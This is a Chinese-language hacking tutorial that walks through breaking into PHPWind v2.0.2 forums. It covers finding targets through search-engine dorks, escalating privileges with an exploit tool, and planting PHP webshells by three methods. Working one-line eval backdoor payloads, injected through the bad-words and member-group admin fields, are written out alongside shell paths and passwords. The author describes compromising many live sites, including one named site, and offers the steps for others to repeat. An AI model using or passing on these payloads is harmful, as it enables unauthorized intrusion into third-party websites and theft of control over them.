phpwind漏洞利用终结篇

这漏洞出了也有段时间了..开始在Q里..三少哥哥先发了漏洞利用工具给我..然后自己试着传上了PHP马..然后枫三少又告诉我一种方法...拿下了不少站...当晚准备把文章赶写出来..太困了就没继续写...这几天家里发生的事太多..一直也没时间写...最近网上也出了文章和教程,我看了下都不是很完整..今天我就来做个完结篇的..算是庆祝我升黑基管理员把....
首先在baidu或google搜索Powered by PHPWind v2.0.2 或Powered by PHPWind v2.0.2, PLUS V2.1
【phpwind漏洞利用终结篇】为了不耽误大家时间..我提前找了一个
http://www.arebbs.com/先注册一个...注册过程我想大家都会的把.. 。我已经注册好了..登陆.
然后用玄猫写的phpwind提升漏洞测试程序提权.
提示失败..但也不要灰心...我们来看下..看..多出了一个"系统设置 "
我在测试的时候.发现好几个站都是这样,.但结果都是成功的...下面我们继续拿webshell
将介绍三种方法给大家
请将此文件(template/baobao/header.htm)属性设置为 777 可写模式
汗了...好象管理员发现了..把这个设置了不可写...
大家可以找别的站试下...把方法说下
方法一.
进入后台,找到“风格模板设置”
在原有的代码前面加入以下代码:


保存后,木马地址为当前目录下的faq.php
在本机用如下表单进行提交:

METHOD="POST">



上传成功后的木马存在论坛目录下
直接访问就行!
假设现在的这个是可以的...
这个是我以前搞的..我试下还能用不..看样是不行了..大家只要把这里换一下..然后就可以本地上传任意文件了..前提是次目录是可写的...如果不可写..我们还可以利用第二种方法..
方法二.
首先用EXP进入后台,在后台里执行如下过程:
新增 不良词语写 a"]="aa";eval($_POST["a"]);// 替换为那里可以写随便写..我这里替换了11
而后得到一个shell地址为 http://www.arebbs.com/data/bbscache/wordsfb.php
写如成功后wordsfb.php文件的代码就成了
$wordsfb["a"]="aa";eval($_POST["a"]);//"]="1";
?>
然后用lanker微型PHP后门客户2.0正式版.htm上传一个新PHP马...密码是a
这样我们就得到webshell了...
本程序目录..我们来传个马看下.hb.php是angel写的PHP马...出现OK就是上传成功...我们访问下看看
http://www.arebbs.com/data/bbscache/hb.php
密码www.ciker.org登陆/....就这么简单...:)
下面还有一个方法是在网上看到的..也介绍下把..
方法三.
用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a";eval($_POST["a"]);//
升级点数依然可以随意写 。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门 。
接下来的就跟方法二要做的一样了..
我们试下有没成功.密码同样是a
晕...
难道被发现了?
估计是封了我IP
webshell可以访问...看样是把我IP封了..刚才试的时候...出了错误..
感觉是
升级图片号写a";eval($_POST["a"]);//
这句问题.如果大家在测试时候也出现和我同样的错误
把a";eval($_POST["a"]);//这个改为
a"]="aa";eval($_POST["a"]);//...我就不费时间去找别的站测试了...如果大家有好的发现欢迎与我交流

    推荐阅读